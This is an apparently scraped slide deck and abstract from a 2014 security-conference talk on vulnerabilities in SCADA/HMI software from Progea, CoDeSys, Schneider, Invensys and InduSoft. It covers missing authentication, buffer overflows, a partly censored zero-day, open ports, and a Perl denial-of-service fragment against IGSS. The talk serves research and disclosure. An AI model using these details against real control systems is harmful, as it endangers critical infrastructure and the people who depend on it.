The talk is about SCADA vulnerabilities and exploiting. We will answer some specific questions about SCADA software vulnerabilities with technical details.
The questions are;
- Why are SCADA applications buggy?
- What is the status and impact of the threat?
- How do researchers or hackers discover these vulnerabilities?
In this talk we will also look at some SCADA vulnerabilities that affects well-known SCADA/HMI vendors, and will show how it's easy to hunt these vulnerabilities via reverse engineering , fuzzing etc.
Celil UNUVER
Celil Unuver is co-founder & security researcher of SignalSEC Ltd. He is also founder of NOPcon Security Conference. His areas of expertise include Vulnerability Research & Discovery, Exploit Development, Penetration Testing and Reverse Engineering. He has been a speaker at CONFidence, Swiss Cyber Storm, c0c0n, IstSec, Kuwait Info Security Forum. He enjoys hunting bugs and has discovered critical vulnerabilities affect well-known vendors such as Adobe, IBM, Microsoft, Novell etc.
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
SCADA Software or Swiss Cheese Software? by Celil UNUVER
1. SCADA
So'ware
or
Swiss
Cheese
So'ware?
Code
Blue
2014
,
Tokyo
Celil
ÜNÜVER,
SignalSEC
Ltd.
2. Agenda
• About
me
• How
it
started?
• Why
are
SCADA
apps
so
BUGGY?
• HunGng
SCADA
vulnerabiliGes
• Analysis
of
the
vulnerabiliGes
3. About
me
• Co-‐founder
and
Researcher
@
SignalSEC
Ltd.
• Organizer
of
NOPcon
Hacker
Conference
(Istanbul,Turkey)
• Interested
in
vulnerability
research
,
reversing
• Hunted
a
lot
of
bugs
affect
Adobe,
IBM,
Microso',
Facebook,
Novell
,
SCADA
vendors
etc.
• Has
been
a
speaker
at
CONFidence,
Swiss
Cyber
Storm,
c0c0n
etc.
4. How
it
started?
• SCADA
systems
are
in
our
daily
life
for
long
years!
• There
was
not
too
much
interest
in
SCADA
Security
5. Milestone
• Stuxnet
and
Duqu
a^acks
in
2010
–
2011
• SCADA
systems
got
a^enGon
of
hackers
and
researchers
a'er
these
a^acks.
• CriGcal
systems
,
fame,
profit
etc..
• They
are
all
JUICY
target
• Lots
of
SCADA
systems
are
open
to
INTERNET
8. ICS
VulnerabiliGes
• Hardware/Firmware
VulnerabiliGes:
Vulns
in
PLC
&
RTU
devices
• So'ware
VulnerabiliGes:
Vulns
in
Control
System
So'ware(HMI)
but
also
affects
PLC/RTU
devices
9.
TWO
DOZEN
BUGS
IN
A
FEW
HOURS
10.
Trust
me
,
it’s
easy!
Actually,
it’s
really
easy
to
hunt
SCADA
BUGS!!!
11. Why
it’s
easy?
There
wasn’t
a
real
threat
for
SCADA
soEware
unFll
2010
So
the
developers
were
not
aware
of
SECURE
Development
13. HunGng
VulnerabiliGes
“You
must
understand
that
there
is
more
than
one
path
to
the
top
of
the
mountain.”
-‐
Miyamoto
Musashi
-‐
14. Case-‐1:
CoDeSys
Gateway
Vuln
•
CoDeSys
is
development
environment
for
industrial
control
systems
used
by
lots
of
manufacturers.
• Aaron
Portnoy
from
Exodus
discovered
these
vulnerabiliGes.
• Status:
Patched
22. Case-‐1:
RecommendaGon
• Actually,
file
remove
/
upload
bugs
are
‘feature’
of
this
applicaGon
☺
• But
there
is
no
authenGcaGon
for
these
operaGons.
Somebody
can
reverse
the
packet
structure
and
use
these
features
for
evil!
• To
solve
this
kind
of
bugs,
developers
should
add
an
“authenGcaGon”
step
before
execuGg
opcodes.
• Patched
in
2013
23. An
InteresGng
Story:
Progea
MOVICON
Vulnerability
–
sGll
0day
“When
a
patch
doesn’t
patch
anything!”
• 23
Nov
2013:
I’ve
discovered
some
vulnerabiliGes
on
the
latest
version
of
Progea
MOVICON
HMI
so'ware
• 24
Nov
2013:
We’ve
published
a
short
analysis
on
Pastebin
• 3
Dec
2013:
ICS-‐CERT
contacted
us
about
the
post
on
Pastebin.
They
asked
details
,
we
sent
informaGon
etc.
24. An
InteresGng
Story:
Progea
MOVICON
Vulnerability
–
0day
• 5
Dec
2013:
• from
ICS-‐CERT
to
me;
25. An
InteresGng
Story:
Progea
MOVICON
Vulnerability
–
0day
• THEY
SAY
:
The
bugs
you
discovered
are
SIMILAR
to
a
bunch
of
OLDER
BUGS
and
PATCHED
IN
2011.
• ICSA-‐11-‐056;
• My
findings
looks
exactly
same!!!!
But
I
am
able
to
reproduce
on
the
latest
version!!
26. An
InteresGng
Story:
Progea
MOVICON
Vulnerability
–
0day
• These
bugs
are
similar
to
the
bugs
that
we
analyzed
in
Case-‐1:CoDeSys
• There
is
NO
authenGcaGon
to
call
some
funcGons
,
operaGons
in
the
so'ware.
Somebody
can
reverse
the
packet
structure
and
use
these
features
for
evil!
• A"er
a
conversa,on
with
Code
Blue
staff,
we
have
decided
to
mask
some
details
of
this
zero-‐day
vulnerability.
29. An
InteresGng
Story:
Progea
MOVICON
Vulnerability
–
0day
• Opcode
[-‐censored-‐]
calls
GetVersionExA
API
and
sends
output
to
the
client
30. An
InteresGng
Story:
Progea
MOVICON
Vulnerability
–
0day
• Here
is
a
simple
PoC
for
this
bug;
31. An
InteresGng
Story:
Progea
MOVICON
Vulnerability
–
0day
• When
we
run
it
and
call
opcode
[-‐censored-‐]:
• 6th
byte
in
printed
data
is
"dwMajorVersion"
which
is
a
return
value
of
GetVersionExA
and
gives
informaGon
about
the
OS.
• Status:
PATCHED(!)
in
2011
but
we
are
able
to
exploit
it
in
2014!
32. An
InteresGng
Story:
Progea
MOVICON
Vulnerability
–
0day
• So
what
is
the
problem?
Why
old
bugs
are
sGll
there
!?
• A'er
comparing
the
older
version
and
the
latest
version
,
I
understood
that
actually
vendor
didn’t
patch
anything.
• Instead
of
fixing
vulnerabiliGes,
they
just
changed
“opcodes”
of
the
funcGons
in
new
version!
• Older
version:
Opcode
7
causes
info
disclosure
vulnerability
by
calling
GetVersionEx
API
•
New
version:
They
just
changed
opcode
“7”
to
“X”
for
calling
GetversionEx
API
34. Temporary
soluGon
• Block
remote
connecGons
to
TCP:10651
• If
you
contact
me
in
personal
,
I
can
share
vulnerability
signatures
that
you
can
use
in
your
IDS/IPS
(snort
etc.)
35. Case-‐3:
CoDeSys
WebVisu
• CodeSys
WebVisu
uses
a
webserver
which
is
usually
open
to
Internet
for
visualizaGon
of
PLC
• Discovered
by
me
• Status:
Patched
36. Case-‐3:
CoDeSys
Vulnerability
• Buffer
overflow
vulnerability
when
parsing
long
h^p
requests
due
to
an
unsafe
funcGon.
• It
uses
“vsprinv”
to
print
which
file
is
requested.
37. Case-‐4:
Schneider
IGSS
Vulnerability
• Gas
DistrubuFon
in
Europe
• Airport
in
Asia
• Traffic
Control
Center
in
Europe
38. Case-‐4:
Schneider
IGSS
Vulnerability
• Discovered
by
me
• Status:
Patched
• IGSS
listens
12399
and
12397
ports
in
runGme
• A
simple
bunch
of
code
causes
to
DoS
use
IO::Socket;
$host
=
"localhost";
$port
=
12399;
$port2
=
12397;
$first
=
"x01x01x00x00";
$second
=
"x02x01x00x00";
39. Case-‐5:
Schneider
Electric
Accutech
Heap
Overflow
Vulnerability
Buffer
overflow
vulnerability
when
parsing
long
h^p
requests
due
to
an
unsafe
funcGon
Status:
Patched
43. Case-‐6:
Invensys
Wonderware
System
Plavorm
Vulnerability
• Discovered
by
me
• Status:
Patched
• Killing
five
birds
with
one
stone
☺
44. Case-‐6:
Invensys
Wonderware
System
Plavorm
Vulnerability
• An
AcGveX
Buffer
Overflow
vulnerability
• Just
found
by
AcGveX
fuzzing...
• Send
the
exploit
URL
to
HMI
Operator
• Click
and
pwn
!
46. Case-‐7:
InduSo'
HMI
Bugs
• This
is
really
creepy!
• This
so'ware
doesn’t
check
even
any
“magic”
value
of
incoming
packets.
There
is
no
custom
packet
structure!
• Sending
1
byte
to
TCP:4322
is
enough
to
jump
a
switch
case
51.
Conclusion
• CriGcal
Infrastructures
are
juicy
targets!
• HackGvists
are
interested
in
SCADA
Hacking
too.
Not
only
government
intelligence
agencies.
• ApplicaFons
are
insecure!